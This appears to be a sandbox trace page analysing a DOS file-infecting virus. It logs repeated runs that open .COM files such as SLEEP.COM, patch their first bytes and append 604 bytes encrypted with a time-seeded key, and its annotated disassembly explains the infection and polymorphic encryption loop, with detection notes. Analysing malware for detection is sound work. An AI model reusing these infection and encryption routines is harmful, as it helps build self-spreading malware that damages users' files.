2018-12-25T12:27:50.08451554Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:50.090890573Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:50.093052468Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:50.095652386Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:50.096934608Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:50.100024483Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:50.10247395Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:50.110157953Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:50.112683266Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:50.120292976Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:50.123627481Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:50.130558693Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:50.136780433Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:50.138278524Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:50.1417129Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:50.143570081Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:50.146314488Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:50.149380319Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:50.158464031Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:50.160087386Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:50.168149001Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:50.171115736Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:50.177483691Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:50.183900418Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:50.186151586Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:50.189585799Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:50.191109023Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:50.194739483Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:50.197149932Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:50.204951473Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:50.207209281Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:50.214288928Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:50.216702096Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:50.223618233Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:50.226209326Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:50.227743487Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:50.235307915Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:50.242868275Z 76 PC: 12a45 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10363,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:51.316276431Z 42 PC: 12ac8 | Get date 0x12ac8: cmp al, 2
0x12aca: ja 0x12aea
0x12acc: mov ah, 0x47
0x12ace: mov dl, 0
0x12ad0: mov si, bp
0x12ad2: add si, 0x210
0x12ad6: int 0x21
0x12ad8: mov dx, bp
0x12ada: add dx, 0x206
0x12ade: mov ah, 0x3b
0x12ae0: int 0x21
0x12ae2: mov bx, bp
0x12ae4: add bx, 0x24f
0x12ae8: inc byte ptr [bx]
0x12aea: mov ah, 0x4e
0x12aec: xor cx, cx
0x12aee: mov dx, bp
0x12af0: add dx, 0x209
0x12af4: int 0x21
0x12af6: jb 0x12afe
2018-12-25T12:27:51.318581426Z 71 PC: 12ad8 | Get current directory
2018-12-25T12:27:51.320869129Z 59 PC: 12ae2 | Change current directory
2018-12-25T12:27:51.3235338Z 78 PC: 12af6 | Find first file
2018-12-25T12:27:51.331799897Z 61 PC: 12b98 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:51.339166149Z 63 PC: 12ba7 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T12:27:51.343069869Z 66 PC: 12bd1 | Move file pointer
2018-12-25T12:27:51.345182019Z 64 PC: 12bde | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:27:51.347674954Z 66 PC: 12be7 | Move file pointer
2018-12-25T12:27:51.348824033Z 64 PC: 12bf4 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:27:51.352103513Z 44 PC: 12c0a | Get time 0x12c0a: mov ah, dh
0x12c0c: add dx, word ptr [bx + 2]
0x12c0f: mov word ptr [bx + 2], dx
0x12c12: mov cx, word ptr [0x9a]
0x12c16: add cx, word ptr [bx]
0x12c18: mov word ptr [bx], cx
0x12c1a: mov bx, cx
0x12c1c: mov cx, 0x2e
0x12c1f: rep movsb byte ptr es:[di], byte ptr [si]
0x12c21: mov cx, 0x117
0x12c24: lodsw ax, word ptr [si]
0x12c25: sub ax, bx
0x12c27: sub bx, dx
0x12c29: stosw word ptr es:[di], ax
0x12c2a: loop 0x12c24
0x12c2c: pop bx
0x12c2d: mov dx, bp
0x12c2f: add dx, 0x3e6
0x12c33: mov cx, 0x25c
0x12c36: mov ah, 0x40
2018-12-25T12:27:51.355910938Z 64 PC: 12c3a | Write file or device (Write 604 bytes on handle 5)
2018-12-25T12:27:51.371586727Z 87 PC: 12c47 | Get or set file date and time
2018-12-25T12:27:51.374320647Z 62 PC: 12c4b | Close file
2018-12-25T12:27:51.387198912Z 79 PC: 12b05 | Find next file
2018-12-25T12:27:51.390242816Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:51.397188714Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:51.405625589Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:51.407349424Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:51.409865727Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:51.41965306Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:51.427787415Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:51.430262228Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:51.439171797Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:51.440920218Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:51.449353198Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:51.46105196Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:51.473102256Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:51.479492758Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:51.481543509Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:51.484314096Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:51.48569045Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:51.489097016Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:51.491527522Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:51.4997824Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:51.502124856Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:51.510416696Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:51.513295764Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:51.520032469Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:51.527430957Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:51.528671476Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:51.531133334Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:51.533087653Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:51.535919249Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:51.538465554Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:51.547415638Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:51.549370208Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:51.562528456Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:51.565927784Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:51.572477352Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:51.579329441Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:51.581623368Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:51.584755795Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:51.586369248Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:51.589269761Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:51.594688365Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:51.602947227Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:51.604677958Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:51.613242632Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:51.61623642Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:51.622784114Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:51.630763719Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:51.633023472Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:51.635994548Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:51.638413126Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:51.641655016Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:51.644320223Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:51.653867237Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:51.655510838Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:51.685319982Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:51.702079115Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:51.709554265Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:51.716070871Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:51.719891174Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:51.724267938Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:51.726033196Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:51.729057786Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:51.733089035Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:51.750689083Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:51.752272198Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:51.760607647Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:51.763280553Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:51.770283419Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:51.777186094Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:51.778872599Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:51.786440416Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:51.789777431Z 59 PC: 12c61 | Change current directory
2018-12-25T12:27:51.794299727Z 76 PC: 12a45 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10363,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Annotated disassembly (sandbox trace excerpt): directory handling and file search via 16-bit DOS INT 21h.
; Runs right after the logged "Get date" call (INT 21h AH=2Ah), which returns the day of week in AL (0 = Sunday).
; Every data reference is BP + constant -- presumably BP holds the code's own load offset; confirm against the entry stub.
; NOTE(review): behaviour is date-dependent. In this run the trace goes from "Get date" straight to
; "Find first file", so the ja below appears to have been taken; other runs of the same sample on this page
; log "Get current directory" (12ad8) and "Change current directory" (12ae2) in between. The run configuration
; on the page gives 1980-01-02, a Wednesday (AL = 3), if it applies to this run. A verdict taken from a single
; clock setting can therefore miss one of the two paths.
2018-12-25T12:27:51.472148867Z 42 PC: 12ac8 | Get date 0x12ac8: cmp al, 2 ; day of week vs 2 (Tuesday)
0x12aca: ja 0x12aea ; unsigned AL > 2: skip the directory change, go straight to the search
0x12acc: mov ah, 0x47 ; AH=47h: get current directory
0x12ace: mov dl, 0 ; DL=0 selects the default drive
0x12ad0: mov si, bp
0x12ad2: add si, 0x210 ; DS:SI = bp+0x210, buffer that receives the current path
0x12ad6: int 0x21
0x12ad8: mov dx, bp
0x12ada: add dx, 0x206 ; DS:DX = bp+0x206, ASCIIZ path (only 3 bytes before the filespec at bp+0x209)
0x12ade: mov ah, 0x3b ; AH=3Bh: change current directory
0x12ae0: int 0x21
0x12ae2: mov bx, bp
0x12ae4: add bx, 0x24f
0x12ae8: inc byte ptr [bx] ; bump the byte at bp+0x24f -- presumably a "directory was changed" marker; its reader is not shown
0x12aea: mov ah, 0x4e ; AH=4Eh: find first matching file
0x12aec: xor cx, cx ; CX=0: attribute mask 0
0x12aee: mov dx, bp
0x12af0: add dx, 0x209 ; DS:DX = bp+0x209, ASCIIZ search pattern (contents not shown in the trace)
0x12af4: int 0x21
0x12af6: jb 0x12afe ; CF set = the search call failed; the target at 0x12afe is outside the lines shown
2018-12-25T12:27:51.473960806Z 78 PC: 12af6 | Find first file
2018-12-25T12:27:51.478728064Z 61 PC: 12b98 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:51.483113279Z 63 PC: 12ba7 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T12:27:51.487257144Z 66 PC: 12bd1 | Move file pointer
2018-12-25T12:27:51.48915572Z 64 PC: 12bde | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:27:51.491120573Z 66 PC: 12be7 | Move file pointer
2018-12-25T12:27:51.492109683Z 64 PC: 12bf4 | Write file or device (Write 5 bytes on handle 5)
; Annotated disassembly (sandbox trace excerpt): builds the 604-byte buffer that the next logged call writes to the open file.
; Runs right after the logged "Get time" call (INT 21h AH=2Ch: CH = hour, CL = minute, DH = second, DL = 1/100 s).
; Layout of the output: 0x2e bytes copied unchanged, then 0x117 words transformed: 46 + 2*279 = 604 = 0x25c bytes.
; SI, DI, ES and the initial BX are set up before the lines shown.
; Detection note: the running key is seeded from stored words plus the word at DS:0x9a, and its step includes the
; clock value in DX, so the 558 transformed bytes should differ from one written copy to the next. A static
; signature is better anchored on the 46 bytes copied unchanged or on the call sequence in the trace -- verify
; against more than one written file.
2018-12-25T12:27:51.495027573Z 44 PC: 12c0a | Get time 0x12c0a: mov ah, dh ; AH = seconds; not read again in the lines shown (lodsw overwrites AX)
0x12c0c: add dx, word ptr [bx + 2] ; DX = seconds:hundredths + stored word at [bx+2]
0x12c0f: mov word ptr [bx + 2], dx ; store the new step back
0x12c12: mov cx, word ptr [0x9a] ; absolute DS:0x9a -- if the DTA is still the default PSP:0x80 this is the low word of the found file's size (DTA+0x1a); TODO confirm
0x12c16: add cx, word ptr [bx] ; add the stored word at [bx]
0x12c18: mov word ptr [bx], cx ; store the new seed back
0x12c1a: mov bx, cx ; BX = running key for the loop below
0x12c1c: mov cx, 0x2e ; 46 bytes
0x12c1f: rep movsb byte ptr es:[di], byte ptr [si] ; copied verbatim from DS:SI to ES:DI
0x12c21: mov cx, 0x117 ; 279 words = 558 bytes
0x12c24: lodsw ax, word ptr [si] ; next source word
0x12c25: sub ax, bx ; subtract the running key
0x12c27: sub bx, dx ; key changes by the time-derived step on every word
0x12c29: stosw word ptr es:[di], ax ; store the transformed word
0x12c2a: loop 0x12c24
0x12c2c: pop bx ; restores a BX pushed before the lines shown -- presumably the file handle, which AH=40h takes in BX
0x12c2d: mov dx, bp
0x12c2f: add dx, 0x3e6 ; DS:DX = bp+0x3e6, buffer to write (presumably where DI pointed above)
0x12c33: mov cx, 0x25c ; 604 bytes, matching "Write 604 bytes on handle 5" in the trace
0x12c36: mov ah, 0x40 ; AH=40h: write to file handle; the int 0x21 itself follows at 0x12c38, outside the listing
2018-12-25T12:27:51.496738231Z 64 PC: 12c3a | Write file or device (Write 604 bytes on handle 5)
2018-12-25T12:27:51.508574162Z 87 PC: 12c47 | Get or set file date and time
2018-12-25T12:27:51.510930184Z 62 PC: 12c4b | Close file
2018-12-25T12:27:51.519019993Z 79 PC: 12b05 | Find next file
2018-12-25T12:27:51.522189583Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:51.538426132Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:51.544773377Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:51.546100873Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:51.549130903Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:51.55435997Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:51.562767939Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:51.565378933Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:51.573578531Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:51.5803626Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:51.589893544Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:51.603603035Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:51.61024193Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:51.621890876Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:51.624423351Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:51.633818339Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:51.638851801Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:51.642716098Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:51.645651527Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:51.653748528Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:51.656872472Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:51.664743638Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:51.667683237Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:51.674797946Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:51.681268391Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:51.682769706Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:51.685831463Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:51.688414068Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:51.691267874Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:51.693530317Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:51.701818682Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:51.703155958Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:51.710620999Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:51.714306151Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:51.72103268Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:51.727785279Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:51.730707636Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:51.734130765Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:51.735907956Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:51.740200255Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:51.742941483Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:51.75122894Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:51.753776805Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:51.762102354Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:51.764931087Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:51.772286366Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:51.779105318Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:51.780812106Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:51.783925347Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:51.78587732Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:51.788768802Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:51.791489355Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:51.800997173Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:51.802718958Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:51.810401233Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:51.813506909Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:51.820144382Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:51.827096116Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:51.829339937Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:51.832159143Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:51.833758859Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:51.837121656Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:51.839626578Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:51.847658972Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:51.849779843Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:51.857415348Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:51.860163031Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:51.86704519Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:51.869496057Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:51.870983353Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:51.877943649Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:51.885007011Z 76 PC: 12a45 | Terminate with return code (Return code = '1')